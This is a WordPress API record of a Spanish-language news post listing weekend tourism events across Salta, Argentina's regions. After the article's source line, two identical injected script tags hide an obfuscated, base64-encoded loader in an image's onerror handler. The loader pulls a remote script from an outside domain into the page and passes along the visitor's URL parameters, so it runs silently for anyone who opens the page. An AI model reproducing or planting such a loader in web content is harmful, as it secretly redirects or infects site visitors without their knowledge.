{"id":4192,"date":"2024-07-10T15:12:29","date_gmt":"2024-07-10T18:12:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4192"},"modified":"2025-08-13T23:52:55","modified_gmt":"2025-08-14T02:52:55","slug":"diversas-experiencias-turisticas-para-enamorarte-de-salta-este-fin-de-semana","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4192","title":{"rendered":"Diversas experiencias tur\u00edsticas para enamorarte de Salta este fin de semana"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-b791e65a7bee1624d05ed4466296a449\" style=\"background-color:#59033a\"><em>Salte\u00f1os y visitantes tendr\u00e1n un abanico de propuestas para disfrutar en las siete regiones tur\u00edsticas de la provincia, entre las que se destacan el Festival del Trichaco en Santa Victoria Este; el Festival de la Cabeza Guateada en Campo Quijano; el 21\u00ba Encuentro de Artesanos y Emprendedores en La Caldera, entre otros.<\/em><\/h4>\n\n\n\n<p>El&nbsp;<strong>Ministerio de Turismo y Deportes<\/strong>&nbsp;cuenta con un completo programa de actividades, organizadas por el sector privado y por los gobiernos municipales, que conquistar\u00e1n y enamorar\u00e1n a salte\u00f1os y visitantes a lo largo y ancho de las distintas regiones de la Provincia. El calendario completo se puede consultar en&nbsp;<a href=\"https:\/\/www.saltacalendario.gob.ar.\/\">https:\/\/www.saltacalendario.gob.ar.<\/a><\/p>\n\n\n\n<p>A continuaci\u00f3n las actividades que se realizar\u00e1n en los distintos municipios desde el jueves 11 hasta el domingo 14 de enero. Los horarios se pueden consultar en los centros de visitantes de cada lugar.<\/p>\n\n\n\n<p>En la Ciudad de Salta, los d\u00edas jueves 11, viernes 12 y domingo 14 se podr\u00e1 disfrutar de distintos circuitos guiados en bicicleta, pudiendo ir desde el Monumento 20 de Febrero hasta el Monumento a G\u00fcemes, o bien, desde la Plaza del Deporte de Tres Cerritos recorriendo los murales de artistas salte\u00f1os plasmados en los edificios de Parque Belgrano. El s\u00e1bado 13, adem\u00e1s, tendr\u00e1 lugar el 56\u00ba aniversario del Mercado Artesanal.<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12940-diversas-experiencias-turisticas-para-enamorarte-de-salta-este-fin-de-semana.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12940-diversas-experiencias-turisticas-para-enamorarte-de-salta-este-fin-de-semana.jpeg\" alt=\"Diversas experiencias tur\u00edsticas para enamorarte de Salta este fin de semana\"\/><\/a><\/figure>\n\n\n\n<p>A 10 kil\u00f3metros de la ciudad, San Lorenzo tiene preparadas un sinf\u00edn de actividades para recibir a turistas y visitantes que podr\u00e1n visitar el Museo del Autom\u00f3vil y el Museo Did\u00e1ctico de la Gesta G\u00fcemesiana y Gaucha; degustar vinos artesanales en la Bodega Martearena, realizar paseos guiados por el circuito interpretativo de la Quebrada de San Lorenzo en forma gratuita; recorrer puntos de inter\u00e9s con el bus tur\u00edstico; aprender a bailar folclore en la pasarela de la Quebrada; disfrutar de la gastronom\u00eda en el Paseo Parque Costanera y en la feria regional El Zorzal; y realizar trekking por la Reserva Las Yungas.<\/p>\n\n\n\n<p>Continuando con los destinos cercanos, en La Caldera, los d\u00edas 13 y 14, &nbsp;se llevar\u00e1 adelante una nueva edici\u00f3n del Encuentro de Artesanos y Emprendedores en el Predio de Artesanos, donde se realizar\u00e1 la recepci\u00f3n del primer turista, habr\u00e1 fonda de comida, artesan\u00edas y juegos tradicionales.<\/p>\n\n\n\n<p>En la regi\u00f3n del Valle de Lerma se puede disfrutar en la localidad de Campo Quijano, los d\u00edas jueves 11 y viernes 12, de la Feria de Artesanos del Tren, de los paseos guiados pedestres y gratuitos por la estaci\u00f3n de trenes o el casco c\u00e9ntrico; y visitar del Museo del Tren. Adem\u00e1s el s\u00e1bado 13 se podr\u00e1 realizar un trekking por los senderos del municipio, y el domingo 14 ser\u00e1 el 7\u00ba festival de la cabeza guateada y tendr\u00e1n lugar diferentes ferias de artesanos en el Viaducto El Toro, Plaza Mart\u00edn Fierro y Plaza 8 de diciembre de la Silleta.<\/p>\n\n\n\n<p>En Cerrillos, el s\u00e1bado 13 se realizar\u00e1 la Expo Cerrillos en la Plaza Principal con un mercado itinerante, feria de artesanos, paseo gastron\u00f3mico, corso de invierno y n\u00fameros art\u00edsticos. Asimismo el domingo 14 se podr\u00e1 vivir el 36\u00ba Festival de la Yerra, Jineteada y Folclore en el Predio Islas Malvinas de La Vi\u00f1a, y la 8\u00ba edici\u00f3n del Concurso del Locro y feria gastron\u00f3mica en la Estaci\u00f3n Zuvir\u00eda de El Carril.<\/p>\n\n\n\n<p>Llegando a los Valles Calchaqu\u00edes, en Cafayate habr\u00e1 distintas actividades durante todo el fin de semana, entre ellas una exposici\u00f3n de arte en el Centro Cultural, una muestra fotogr\u00e1fica de las etapas de la vid y bit\u00e1cora viajeros en movimiento con juegos para toda la familia en el Museo de la Vid y el Vino, y distintas obras de teatro en el nuevo Cine Teatro Municipal. Adem\u00e1s el viernes 12 se realizar\u00e1 la recepci\u00f3n del primer turista de la temporada de invierno con entrega de presentes y espect\u00e1culos en vivo en la Plaza Principal de la localidad.<\/p>\n\n\n\n<p>Por su parte, en Cachi todos los d\u00edas se realizar\u00e1n guiados acompa\u00f1ados de anfitriones locales para que turistas y visitantes descubran un \u201cpueblo aut\u00e9ntico\u201d; mientras que el jueves 11 en el Mirador Norte se realizar\u00e1 una observaci\u00f3n astron\u00f3mica del cielo del Alto Valle, y el s\u00e1bado 13 ser\u00e1 la recepci\u00f3n del primer turista en la Plazoleta de los artesanos, y habr\u00e1 una feria de emprendedores y artesanos en la plaza principal, que se desarrollar\u00e1 tambi\u00e9n el domingo 14. &nbsp;<br>San Carlos el s\u00e1bado 13 recibir\u00e1 a los primeros turistas en la Plaza 4 de noviembre con una pe\u00f1a folcl\u00f3rica; ese mismo d\u00eda y el domingo 14 se realizar\u00e1 el taller vivencial \u201cCon las Manos en el Barro\u201d.<br>&nbsp;<\/p>\n\n\n\n<p>Pasando al Valle Hist\u00f3rico y Gaucho, en Met\u00e1n el jueves 11 se realizar\u00e1 una bicicleteada por la ciudad partiendo desde la Plaza General Belgrano, el viernes 12 habr\u00e1 una noche de tango en la Casa de la Cultura y el s\u00e1bado 13 un karaoke infantil y feria de emprendedores y artesanos en el paseo Ferro Urban\u00edsticos. En el Sal\u00f3n Cultural Ing. Rodolfo Clerico de la localidad de El Galp\u00f3n se desarrollar\u00e1 el Festi Ni\u00f1o, y el domingo 14 ser\u00e1 la celebraci\u00f3n del Tinkunaco en la Plaza Principal.<\/p>\n\n\n\n<p>En tanto, el viernes 12 en el Complejo Municipal de Rosario de la Frontera habr\u00e1 una capacitaci\u00f3n y torneo de tejo con entrada libre y gratuita; y en el Cine Teatro G\u00fcemes se realizar\u00e1n durante el fin de semana distintos espect\u00e1culos folcl\u00f3ricos. As\u00ed, en la localidad de General G\u00fcemes se podr\u00e1 disfrutar los d\u00edas viernes 12 y s\u00e1bado 13 de una kermesse con feria artesanal con juegos y stand; y el domingo 14 tendr\u00e1 lugar \u201cLa voz kids\u201d, un concurso para ni\u00f1os y adolescentes.<\/p>\n\n\n\n<p>Por otro lado, en la regi\u00f3n Selva de Monta\u00f1a, del 12 al 14 de julio en Rancho del \u00d1ato de Santa Victoria Este, se vivir\u00e1 una nueva edici\u00f3n del Festival Trichaco con una cartelera de destacados artistas; el s\u00e1bado 13 en la localidad de Aguaray se realizar\u00e1 una salida de trekking a los saltos de agua de capiazuty y en el municipio de Or\u00e1n se har\u00e1 una peregrinaci\u00f3n juvenil, asimismo en esta localidad el domingo 14 se realizar\u00e1 una caminata por la selva de yungas con observaci\u00f3n de aves y recorrido por el R\u00edo Blanco.<\/p>\n\n\n\n<p>En tanto, todos los domingo Tartagal invita a salte\u00f1os y visitantes a visitar la Plaza San Mart\u00edn y recorrer su feria, donde se encuentran artesanos, emprendedores y dise\u00f1adores artesanales.<\/p>\n\n\n\n<p>Finalmente, en la regi\u00f3n Puna de los Andes, San Antonio de los Cobres ofrece durante todo el fin de semana una gran variedad de actividades, algunas de ellas son: experiencia tejido en telar \u201cPicote de Barracan\u201d, visita al Santuario de la Pachamama, paseo a la cruz \u201cSalva tu Alma\u201d, cine cultural y guiados especiales por las nuevas salas, todas en el Museo Regional Andino. Adem\u00e1s, en el taller de cer\u00e1mica se realizar\u00e1 la experiencia Thuru Maky; en la Casa Anatolio un paseo en llamas; en el Mercado Artesanal guiados diarios, y las experiencias \u201cEntre Lanas\u201d y \u201cRica y Jugosa\u201d. Asimismo en el municipio se podr\u00e1 realizar trekking nocturnos por el Cerro Terciopelo y Camino y Piedra.<\/p>\n\n\n\n<p>A estas actividades se suma la oferta de aventura, naturaleza y gastronom\u00eda que invitan a disfrutar de Salta con todos los sentidos; desde el aire en globo aerost\u00e1tico, rafting en el ca\u00f1\u00f3n del r\u00edo Juramento, actividades n\u00e1uticas en el dique Cabra Corral, de una empanadas y de un vino de altura. Estas opciones pueden encontrarse con m\u00e1s detalle en&nbsp;<a href=\"http:\/\/experiencias.turismosalta.gov.ar%20%20\/\">http:\/\/experiencias.turismosalta.gov.ar &nbsp;<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Salte\u00f1os y visitantes tendr\u00e1n un abanico de propuestas para disfrutar en las siete regiones tur\u00edsticas de la provincia, entre las que se destacan el Festival del Trichaco en Santa Victoria Este; el Festival de la Cabeza Guateada en Campo Quijano; el 21\u00ba Encuentro de Artesanos y Emprendedores en La Caldera, entre otros. El&nbsp;Ministerio de Turismo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4193,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-4192","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4192"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4192"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4192\/revisions"}],"predecessor-version":[{"id":6743,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4192\/revisions\/6743"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4193"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4192"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}